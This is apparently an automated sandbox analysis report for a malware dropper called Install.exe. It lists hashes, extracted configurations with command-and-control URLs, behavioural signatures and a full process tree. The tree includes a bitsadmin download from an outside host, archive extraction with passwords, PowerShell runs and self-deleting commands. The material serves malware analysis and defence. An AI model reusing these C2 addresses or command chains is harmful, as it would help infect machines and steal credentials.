Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1801s
  • max time network
    1696s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 18:20

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 38 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1064
      • C:\Users\Admin\AppData\Roaming\eerbugi
        C:\Users\Admin\AppData\Roaming\eerbugi
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4680
        • C:\Users\Admin\AppData\Roaming\eerbugi
          C:\Users\Admin\AppData\Roaming\eerbugi
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:1992
      • C:\Users\Admin\AppData\Roaming\farbugi
        C:\Users\Admin\AppData\Roaming\farbugi
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4552
      • C:\Users\Admin\AppData\Roaming\eerbugi
        C:\Users\Admin\AppData\Roaming\eerbugi
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4248
        • C:\Users\Admin\AppData\Roaming\eerbugi
          C:\Users\Admin\AppData\Roaming\eerbugi
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5048
      • C:\Users\Admin\AppData\Roaming\farbugi
        C:\Users\Admin\AppData\Roaming\farbugi
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4564
      • C:\Users\Admin\AppData\Roaming\eerbugi
        C:\Users\Admin\AppData\Roaming\eerbugi
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:2624
        • C:\Users\Admin\AppData\Roaming\eerbugi
          C:\Users\Admin\AppData\Roaming\eerbugi
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:2780
      • C:\Users\Admin\AppData\Roaming\farbugi
        C:\Users\Admin\AppData\Roaming\farbugi
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:1380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1456
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1396
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1288
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1148
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2656
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2428
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2320
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2272
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1864
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:772
                      • C:\Users\Admin\AppData\Local\Temp\is-F711K.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-F711K.tmp\Install.tmp" /SL5="$2011E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1696
                        • C:\Users\Admin\AppData\Local\Temp\is-B9UOQ.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-B9UOQ.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:420
                          • C:\Program Files\Reference Assemblies\WJLMHFNHHP\ultramediaburner.exe
                            "C:\Program Files\Reference Assemblies\WJLMHFNHHP\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3084
                            • C:\Users\Admin\AppData\Local\Temp\is-3EHVU.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-3EHVU.tmp\ultramediaburner.tmp" /SL5="$B003E,281924,62464,C:\Program Files\Reference Assemblies\WJLMHFNHHP\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:500
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:2072
                          • C:\Users\Admin\AppData\Local\Temp\a2-20ace-495-e87ae-5cd457fd1efa8\Lajuwipahae.exe
                            "C:\Users\Admin\AppData\Local\Temp\a2-20ace-495-e87ae-5cd457fd1efa8\Lajuwipahae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1272
                          • C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Geqaevoqomu.exe
                            "C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Geqaevoqomu.exe"
                            4⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3960
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pun3q1hq.faz\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4384
                              • C:\Users\Admin\AppData\Local\Temp\pun3q1hq.faz\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\pun3q1hq.faz\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4500
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ydppck4v.u01\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4488
                              • C:\Users\Admin\AppData\Local\Temp\ydppck4v.u01\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\ydppck4v.u01\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:4640
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aggthv4.lfo\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4520
                              • C:\Users\Admin\AppData\Local\Temp\2aggthv4.lfo\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\2aggthv4.lfo\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:4540
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4972
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4512
                              • C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe
                                C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:4356
                                • C:\Users\Admin\AppData\Local\Temp\3TExLVfB5j.exe
                                  "C:\Users\Admin\AppData\Local\Temp\3TExLVfB5j.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:4128
                                  • C:\Users\Admin\AppData\Roaming\1619209529207.exe
                                    "C:\Users\Admin\AppData\Roaming\1619209529207.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619209529207.txt"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4416
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\3TExLVfB5j.exe"
                                    8⤵
                                      PID:4696
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        9⤵
                                        • Runs ping.exe
                                        PID:4808
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe"
                                    7⤵
                                      PID:1072
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:4220
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\catsskju.fol\inst.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4780
                                  • C:\Users\Admin\AppData\Local\Temp\catsskju.fol\inst.exe
                                    C:\Users\Admin\AppData\Local\Temp\catsskju.fol\inst.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3268
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t2xdd3ld.spx\SunLabsPlayer.exe /S & exit
                                  5⤵
                                    PID:1540
                                    • C:\Users\Admin\AppData\Local\Temp\t2xdd3ld.spx\SunLabsPlayer.exe
                                      C:\Users\Admin\AppData\Local\Temp\t2xdd3ld.spx\SunLabsPlayer.exe /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      PID:4648
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                        7⤵
                                          PID:4984
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                          7⤵
                                            PID:3956
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4712
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                              7⤵
                                                PID:3192
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:496
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4552
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      8⤵
                                                        PID:4712
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:476
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:5052
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pmmxF8bmyU8wzHT7 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:4272
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4124
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:4964
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:764
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:1128
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:2680
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                7⤵
                                                                • Checks for any installed AV software in registry
                                                                PID:476
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
                                                                7⤵
                                                                • Loads dropped DLL
                                                                PID:4820
                                                                • C:\Windows\system32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in System32 directory
                                                                  • Drops file in Program Files directory
                                                                  PID:192
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:1328
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:4108
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    8⤵
                                                                      PID:4696
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4824
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4448
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1"
                                                                        7⤵
                                                                        • Blocklisted process makes network request
                                                                        • Executes dropped EXE
                                                                        PID:4852
                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4368
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\104lqbss.vme\GcleanerWW.exe /mixone & exit
                                                                    5⤵
                                                                      PID:4748
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zvgnzsgp.mcw\toolspab1.exe & exit
                                                                      5⤵
                                                                        PID:5024
                                                                        • C:\Users\Admin\AppData\Local\Temp\zvgnzsgp.mcw\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\zvgnzsgp.mcw\toolspab1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2220
                                                                          • C:\Users\Admin\AppData\Local\Temp\zvgnzsgp.mcw\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\zvgnzsgp.mcw\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4244
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rgaeei42.opg\c7ae36fa.exe & exit
                                                                        5⤵
                                                                          PID:4276
                                                                          • C:\Users\Admin\AppData\Local\Temp\rgaeei42.opg\c7ae36fa.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\rgaeei42.opg\c7ae36fa.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:1364
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe /8-2222 & exit
                                                                          5⤵
                                                                            PID:4428
                                                                            • C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe /8-2222
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:1708
                                                                              • C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe" /8-2222
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:764
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                    1⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1156
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Checks processor information in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:4436
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                    1⤵
                                                                    • Drops file in Windows directory
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:3620
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:1236
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4676
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4940
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                    1⤵
                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                    PID:512
                                                                  • C:\Users\Admin\AppData\Local\Temp\D86F.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\D86F.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:3464
                                                                  • C:\Users\Admin\AppData\Local\Temp\DBEB.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\DBEB.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:4492
                                                                  • C:\Users\Admin\AppData\Local\Temp\E08F.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\E08F.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:1320
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      2⤵
                                                                        PID:4452
                                                                    • C:\Users\Admin\AppData\Local\Temp\EA64.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\EA64.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:4224
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 276
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:4240
                                                                    • C:\Users\Admin\AppData\Local\Temp\EE6C.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\EE6C.exe
                                                                      1⤵
                                                                        PID:4852
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:2512
                                                                        • C:\Windows\explorer.exe
                                                                          C:\Windows\explorer.exe
                                                                          1⤵
                                                                            PID:4720
